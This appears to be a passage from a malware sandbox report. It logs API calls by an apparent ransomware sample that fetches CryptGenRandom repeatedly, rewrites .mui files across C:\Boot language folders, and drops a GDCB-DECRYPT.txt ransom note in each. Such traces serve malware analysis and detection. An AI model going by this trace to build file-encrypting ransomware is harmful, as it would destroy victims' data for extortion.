|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| File | Create | filename = C:\Boot\hr-HR\bootmgr.exe.mui, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Create | filename = C:\Boot\hu-HU\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Boot\hu-HU\\GDCB-DECRYPT.txt, size = 2616 |
|
1 | |
| File | Get Info | filename = C:\Boot\hu-HU\bootmgr.exe.mui, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| File | Create | filename = C:\Boot\hu-HU\bootmgr.exe.mui, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Boot\hu-HU\memtest.exe.mui, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| File | Create | filename = C:\Boot\hu-HU\memtest.exe.mui, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Create | filename = C:\Boot\it-IT\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Boot\it-IT\\GDCB-DECRYPT.txt, size = 2616 |
|
1 | |
| File | Get Info | filename = C:\Boot\it-IT\bootmgr.exe.mui, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| File | Create | filename = C:\Boot\it-IT\bootmgr.exe.mui, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Boot\it-IT\memtest.exe.mui, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| File | Create | filename = C:\Boot\it-IT\memtest.exe.mui, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Create | filename = C:\Boot\ja-JP\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Boot\ja-JP\\GDCB-DECRYPT.txt, size = 2616 |
|
1 | |
| File | Get Info | filename = C:\Boot\ja-JP\bootmgr.exe.mui, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| File | Create | filename = C:\Boot\ja-JP\bootmgr.exe.mui, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Boot\ja-JP\memtest.exe.mui, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| File | Create | filename = C:\Boot\ja-JP\memtest.exe.mui, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Create | filename = C:\Boot\ko-KR\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Boot\ko-KR\\GDCB-DECRYPT.txt, size = 2616 |
|
1 | |
| File | Get Info | filename = C:\Boot\ko-KR\bootmgr.exe.mui, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| File | Create | filename = C:\Boot\ko-KR\bootmgr.exe.mui, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Boot\ko-KR\memtest.exe.mui, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| File | Create | filename = C:\Boot\ko-KR\memtest.exe.mui, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Create | filename = C:\Boot\lt-LT\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Boot\lt-LT\\GDCB-DECRYPT.txt, size = 2616 |
|
1 | |
| File | Get Info | filename = C:\Boot\lt-LT\bootmgr.exe.mui, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| File | Create | filename = C:\Boot\lt-LT\bootmgr.exe.mui, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Create | filename = C:\Boot\lv-LV\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Boot\lv-LV\\GDCB-DECRYPT.txt, size = 2616 |
|
1 | |
| File | Get Info | filename = C:\Boot\lv-LV\bootmgr.exe.mui, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| File | Create | filename = C:\Boot\lv-LV\bootmgr.exe.mui, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Create | filename = C:\Boot\nb-NO\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Boot\nb-NO\\GDCB-DECRYPT.txt, size = 2616 |
|
1 | |
| File | Get Info | filename = C:\Boot\nb-NO\bootmgr.exe.mui, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| File | Create | filename = C:\Boot\nb-NO\bootmgr.exe.mui, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Boot\nb-NO\memtest.exe.mui, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| File | Create | filename = C:\Boot\nb-NO\memtest.exe.mui, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Create | filename = C:\Boot\nl-NL\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Boot\nl-NL\\GDCB-DECRYPT.txt, size = 2616 |
|
1 | |
| File | Get Info | filename = C:\Boot\nl-NL\bootmgr.exe.mui, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| File | Create | filename = C:\Boot\nl-NL\bootmgr.exe.mui, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Boot\nl-NL\memtest.exe.mui, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| File | Create | filename = C:\Boot\nl-NL\memtest.exe.mui, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Create | filename = C:\Boot\pl-PL\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Boot\pl-PL\\GDCB-DECRYPT.txt, size = 2616 |
|
1 | |
| File | Get Info | filename = C:\Boot\pl-PL\bootmgr.exe.mui, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| File | Create | filename = C:\Boot\pl-PL\bootmgr.exe.mui, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Boot\pl-PL\memtest.exe.mui, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| File | Create | filename = C:\Boot\pl-PL\memtest.exe.mui, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Create | filename = C:\Boot\pt-BR\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Boot\pt-BR\\GDCB-DECRYPT.txt, size = 2616 |
|
1 | |
| File | Get Info | filename = C:\Boot\pt-BR\bootmgr.exe.mui, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| File | Create | filename = C:\Boot\pt-BR\bootmgr.exe.mui, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Boot\pt-BR\memtest.exe.mui, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| File | Create | filename = C:\Boot\pt-BR\memtest.exe.mui, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Create | filename = C:\Boot\pt-PT\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Boot\pt-PT\\GDCB-DECRYPT.txt, size = 2616 |
|
1 | |
| File | Get Info | filename = C:\Boot\pt-PT\bootmgr.exe.mui, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| File | Create | filename = C:\Boot\pt-PT\bootmgr.exe.mui, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Boot\pt-PT\memtest.exe.mui, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| File | Create | filename = C:\Boot\pt-PT\memtest.exe.mui, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Create | filename = C:\Boot\qps-ploc\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Boot\qps-ploc\\GDCB-DECRYPT.txt, size = 2616 |
|
1 | |
| File | Get Info | filename = C:\Boot\qps-ploc\bootmgr.exe.mui, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| File | Create | filename = C:\Boot\qps-ploc\bootmgr.exe.mui, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Boot\qps-ploc\memtest.exe.mui, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| File | Create | filename = C:\Boot\qps-ploc\memtest.exe.mui, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Create | filename = C:\Boot\Resources\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Boot\Resources\\GDCB-DECRYPT.txt, size = 2616 |
|
1 | |
| File | Create | filename = C:\Boot\Resources\en-US\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Boot\Resources\en-US\\GDCB-DECRYPT.txt, size = 2616 |
|
1 | |
| File | Get Info | filename = C:\Boot\Resources\en-US\bootres.dll.mui, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| File | Create | filename = C:\Boot\Resources\en-US\bootres.dll.mui, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Create | filename = C:\Boot\ro-RO\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Boot\ro-RO\\GDCB-DECRYPT.txt, size = 2616 |
|
1 | |
| File | Get Info | filename = C:\Boot\ro-RO\bootmgr.exe.mui, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| File | Create | filename = C:\Boot\ro-RO\bootmgr.exe.mui, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Create | filename = C:\Boot\ru-RU\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Boot\ru-RU\\GDCB-DECRYPT.txt, size = 2616 |
|
1 | |
| File | Get Info | filename = C:\Boot\ru-RU\bootmgr.exe.mui, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| File | Create | filename = C:\Boot\ru-RU\bootmgr.exe.mui, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Boot\ru-RU\memtest.exe.mui, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| File | Create | filename = C:\Boot\ru-RU\memtest.exe.mui, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Create | filename = C:\Boot\sk-SK\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Boot\sk-SK\\GDCB-DECRYPT.txt, size = 2616 |
|
1 | |
| File | Get Info | filename = C:\Boot\sk-SK\bootmgr.exe.mui, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| File | Create | filename = C:\Boot\sk-SK\bootmgr.exe.mui, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Create | filename = C:\Boot\sl-SI\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Boot\sl-SI\\GDCB-DECRYPT.txt, size = 2616 |
|
1 | |
| File | Get Info | filename = C:\Boot\sl-SI\bootmgr.exe.mui, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| File | Create | filename = C:\Boot\sl-SI\bootmgr.exe.mui, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Create | filename = C:\Boot\sr-Latn-CS\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Boot\sr-Latn-CS\\GDCB-DECRYPT.txt, size = 2616 |
|
1 | |
| File | Get Info | filename = C:\Boot\sr-Latn-CS\bootmgr.exe.mui, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| File | Create | filename = C:\Boot\sr-Latn-CS\bootmgr.exe.mui, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Create | filename = C:\Boot\sr-Latn-RS\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Boot\sr-Latn-RS\\GDCB-DECRYPT.txt, size = 2616 |
|
1 | |
| File | Get Info | filename = C:\Boot\sr-Latn-RS\bootmgr.exe.mui, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
